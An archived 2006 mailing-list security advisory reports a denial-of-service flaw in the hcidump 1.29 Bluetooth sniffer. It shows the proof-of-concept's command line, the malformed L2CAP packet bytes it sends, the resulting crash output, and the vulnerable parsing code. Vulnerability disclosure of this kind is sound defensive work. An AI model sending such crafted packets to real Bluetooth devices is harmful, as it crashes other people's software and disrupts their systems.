Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[VulnWatch] [ Secuobs - Advisory ] Bluetooth : DoS on hcidump 1.29 + PoC

from [Research Infratech] Network Security [Permanent Link]
Subject: [VulnWatch] [ Secuobs - Advisory ] Bluetooth : DoS on hcidump 1.29 + PoC
Date: Tue, 07 Feb 2006 03:54:44 +0100 
[Software affected] hcidump

[Version] 1.29 (may be other)

[Impact] Denial of Service (may be more)

[Credits] Pierre Betouin - pierre.betouin@infratech.fr - Bug found with BSS 
v0.6 GPL fuzzer (Bluetooh Stack Smasher) 

BSS could be downloaded on 
http://www.secuobs.com/news/05022006-bluetooth10.shtml

[Vendor] was notified

[Original advisory]

http://www.secuobs.com/news/05022006-bluetooth9.shtml#english
http://www.secuobs.com/news/05022006-bluetooth9.shtml#french

[PoC] download it on http://www.secuobs.com/news/05022006-bluetooth8.shtml

[PoC usage]

# ./hcidump-crash 00:80:09:XX:XX:XX
L2CAP packet sent (15)
Buffer: 08 01 0B 00 41 41 41 41 41 41 41 41 41 41 41

# hcidump
HCI sniffer - Bluetooth packet analyzer ver 1.29
device: hci0 snap_len: 1028 filter: 0xffffffff
< HCI Command: Create Connection (0x01|0x0005) plen 13


HCI Event: Command Status (0x0f) plen 4
HCI Event: Connect Complete (0x03) plen 11


< HCI Command: Write Link Policy Settings (0x02|0x000d) plen 4
< ACL data: handle 41 flags 0x02 dlen 19
    L2CAP(s): debug : code=8
Echo req: dlen 12
    L2CAP(s): debug : code=0
code 0x00 ident 0 len 0
(...)
    L2CAP(s): debug : code=0
code 0x00 ident 0 len 0
segmentation fault

[Affected code location] l2cap.c

[Affected code]

while (frm->len >= L2CAP_CMD_HDR_SIZE) {
    if (!p_filter(FILT_L2CAP)) {
        p_indent(level, frm);
        printf("L2CAP(s): ");
    }

    switch (hdr->code) {
    l2cap_cmd_hdr *hdr = frm->ptr;
    frm->ptr += L2CAP_CMD_HDR_SIZE;
    frm->len -= L2CAP_CMD_HDR_SIZE;
    (...)
    default:
        if (p_filter(FILT_L2CAP))
            break;
        printf("code 0x%2.2x ident %d len %d\n",
            hdr->code, hdr->ident, btohs(hdr->len));
            raw_dump(level, frm);
    }
    frm->ptr += btohs(hdr->len);
    frm->len -= btohs(hdr->len);
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [VulnWatch] [ Secuobs - Advisory ] Bluetooth : DoS on hcidump 1.29 + PoC, Research Infratech <=
Previous by Date:  [VulnWatch] [ Secuobs - Advisory ] Bluetooth : DoS on Sony/Ericsson cell phones, Research Infratech
Next by Date:  Re: High Risk Vulnerability in Lexmark Printer Sharing Service, KF (lists)
Previous by Thread:  [VulnWatch] [ Secuobs - Advisory ] Bluetooth : DoS on Sony/Ericsson cell phones, Research Infratech
Next by Thread:  [VulnWatch] [ Secuobs - Tools release ] BSS (Bluetooth Stack Smasher) fuzzer, Research Infratech
Indexes:  [Date] [Thread] [Top] [All Lists]